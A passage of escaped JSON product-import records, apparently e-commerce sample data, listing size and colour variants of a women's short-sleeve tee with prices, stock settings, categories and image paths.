msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Black\"},\"1415\":{\"sku\":\"WS07-XS-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Juliana Short-Sleeve Tee-XS-White\",\"description\":\"<p>The Juliana Short-Sleeve Tee gives you more than sporty style. Consider that its soft Cocona&reg; polyester fabric accelerates evaporation to help keep you dry and comfortable, too. And a selection of colors lets you get more than one.<\\/p>\\n<p>&bull; Black scoop neck tee.<br \\/>&bull; Side rouching.<br \\/>&bull; Relaxed fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"juliana-short-sleeve-tee-xs-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws07-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws07-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws07-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws07-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws07-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"White\"},\"1416\":{\"sku\":\"WS07-XS-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Juliana Short-Sleeve Tee-XS-Yellow\",\"description\":\"<p>The Juliana Short-Sleeve Tee gives you more than sporty style. Consider that its soft Cocona&reg; polyester fabric accelerates evaporation to help keep you dry and comfortable, too. And a selection of colors lets you get more than one.<\\/p>\\n<p>&bull; Black scoop neck tee.<br \\/>&bull; Side rouching.<br \\/>&bull; Relaxed fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"juliana-short-sleeve-tee-xs-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws07-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws07-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws07-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws07-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws07-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Yellow\"},\"1417\":{\"sku\":\"WS07-S-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Juliana Short-Sleeve Tee-S-Black\",\"description\":\"<p>The Juliana Short-Sleeve Tee gives you more than sporty style. Consider that its soft Cocona&reg; polyester fabric accelerates evaporation to help keep you dry and comfortable, too. And a selection of colors lets you get more than one.<\\/p>\\n<p>&bull; Black scoop neck tee.<br \\/>&bull; Side rouching.<br \\/>&bull; Relaxed fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"juliana-short-sleeve-tee-s-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws07-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws07-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws07-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws07-black_alt1.jpg,\\/w\\/s\\/ws07-black_back.jpg\",\"image\":\"\\/w\\/s\\/ws07-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws07-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws07-black_alt1.jpg,\\/w\\/s\\/ws07-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Black\"},\"1418\":{\"sku\":\"WS07-S-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Juliana Short-Sleeve Tee-S-White\",\"description\":\"<p>The Juliana Short-Sleeve Tee gives you more than sporty style. Consider that its soft Cocona&reg; polyester fabric accelerates evaporation to help keep you dry and comfortable, too. And a selection of colors lets you get more than one.<\\/p>\\n<p>&bull; Black scoop neck tee.<br \\/>&bull; Side rouching.<br \\/>&bull; Relaxed fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"juliana-short-sleeve-tee-s-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws07-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws07-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws07-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws07-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws07-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"White\"},\"1419\":{\"sku\":\"WS07-S-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Juliana Short-Sleeve Tee-S-Yellow\",\"description\":\"<p>The Juliana Short-Sleeve Tee gives you more than sporty style. Consider that its soft Cocona&reg; polyester fabric accelerates evaporation to help keep you dry and comfortable, too. And a selection of colors lets you get more than one.<\\/p>\\n<p>&bull; Black scoop neck tee.<br \\/>&bull; Side rouching.<br \\/>&bull; Relaxed fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"juliana-short-sleeve-tee-s-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws07-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws07-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws07-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws07-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws07-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Yellow\"},\"1420\":{\"sku\":\"WS07-M-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Juliana Short-Sleeve Tee-M-Black\",\"description\":\"<p>The Juliana Short-Sleeve Tee gives you more than sporty style. Consider that its soft Cocona&reg; polyester fabric accelerates evaporation to help keep you dry and comfortable, too. And a selection of colors lets you get more than one.<\\/p>\\n<p>&bull; Black scoop neck tee.<br \\/>&bull; Side rouching.<br \\/>&bull; Relaxed fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"juliana-short-sleeve-tee-m-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws07-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws07-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws07-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws07-black_alt1.jpg,\\/w\\/s\\/ws07-black_back.jpg\",\"image\":\"\\/w\\/s\\/ws07-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws07-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws07-black_alt1.jpg,\\/w\\/s\\/ws07-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Black\"},\"1421\":{\"sku\":\"WS07-M-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Juliana Short-Sleeve Tee-M-White\",\"description\":\"<p>The Juliana Short-Sleeve Tee gives you more than sporty style. Consider that its soft Cocona&reg; polyester fabric accelerates evaporation to help keep you dry and comfortable, too. And a selection of colors lets you get more than one.<\\/p>\\n<p>&bull; Black scoop neck tee.<br \\/>&bull; Side rouching.<br \\/>&bull; Relaxed fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"juliana-short-sleeve-tee-m-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws07-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws07-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws07-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws07-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws07-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"White\"},\"1422\":{\"sku\":\"WS07-M-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Juliana Short-Sleeve Tee-M-Yellow\",\"description\":\"<p>The Juliana Short-Sleeve Tee gives you more than sporty style. Consider that its soft Cocona&reg; polyester fabric accelerates evaporation to help keep you dry and comfortable, too. And a selection of colors lets you get more than one.<\\/p>\\n<p>&bull; Black scoop neck tee.<br \\/>&bull; Side rouching.<br \\/>&bull; Relaxed fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"juliana-short-sleeve-tee-m-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws07-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws07-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws07-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws07-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws07-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Yellow\"},\"1423\":{\"sku\":\"WS07-L-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Juliana Short-Sleeve Tee-L-Black\",\"description\":\"<p>The Juliana Short-Sleeve Tee gives you more than sporty style. Consider that its soft Cocona&reg; polyester fabric accelerates evaporation to help keep you dry and comfortable, too. And a selection of colors lets you get more than one.<\\/p>\\n<p>&bull; Black scoop neck tee.<br \\/>&bull; Side rouching.<br \\/>&bull; Relaxed fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"juliana-short-sleeve-tee-l-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws07-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws07-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws07-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_sto